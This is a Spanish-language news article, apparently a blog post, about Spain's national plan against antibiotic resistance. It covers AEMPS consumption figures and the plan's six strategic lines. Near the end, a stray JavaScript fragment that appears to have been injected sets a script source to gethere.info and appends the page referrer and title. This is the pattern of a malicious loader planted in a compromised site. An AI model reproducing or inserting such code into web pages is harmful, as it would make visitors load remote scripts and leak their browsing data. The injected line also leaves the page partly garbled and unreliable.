Estrategias para combatir la resistencia a los antibióticos

La AEMPS puso en marcha en el año 2014 un Plan estratégico y de acción para reducir el riesgo de resistencias a los antibióticos

La OMS considera la resistencia a los antibióticos uno de los principales problemas de salud pública a nivel mundial. Consciente del riesgo que supone este fenómeno, el Ministerio de Sanidad puso en marcha en 2014 el Plan Nacional Resistencia Antibióticos. También la Sociedad Española de Enfermedades Infecciosas y Microbiología Clínica (SEIMC) ha establecido un decálogo para luchar contra las bacterias multirresistentes.

España es el segundo país europeo con mayor consumo de antibióticos, solo por detrás de Malta, y un 50 por ciento de las prescripciones que se realizan tanto en atención primaria como en los hospitales son incorrectas.

Así lo puso de manifiesto Belén Crespo, directora de la Agencia Española de Medicamentos y Productos Sanitarios (AEMPS), en una jornada celebrada el pasado 18 de noviembre en el Ministerio de Sanidad con motivo del Día Europeo del Uso Prudente de los Antibióticos.

El uso de antibióticos propicia que las bacterias desarrollen resistencias a estos medicamentos y que transmitan esta nueva capacidad a las demás mediante el intercambio de material genético, por lo que es de suma importancia no tomarlos de manera incorrecta.

El diagnóstico adecuado y la decisión de administrar un antibiótico son competencia exclusiva de los médicos.

Plan

La AEMPS puso en marcha en el año 2014 un Plan estratégico y de acción para reducir el riesgo de resistencias a los antibióticos, que tiene un periodo de vigencia de cinco años (2014-2018) y cuenta con un total de 20 medidas y 75 acciones.

Entre estas medidas, se incluye la puesta en marcha de planes de optimización del uso de antibióticos en los hospitales, donde se consume el 20% del total.

La formación de los hospitales es otra de las líneas de actuación del Plan. El Hospital La Paz de Madrid ha desarrollado una campaña de concienciación dirigida a los profesionales sanitarios para transmitirles la necesidad de hacer un uso responsable del antibiótico.

El Plan ha establecido seis líneas estratégicas comunes a la sanidad humana y veterinaria para alcanzar sus objetivos:

-Vigilancia del consumo y de la resistencia a los antibióticos

-Controlar las resistencias bacterianas

-Identificar e impulsar medidas alternativas y/o complementarias de prevención y tratamiento

-Definir las prioridades en materia de investigación

-Formación e información a los profesionales sanitarios

-Comunicación y sensibilización de la población en su conjunto y de subgrupos de población.

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado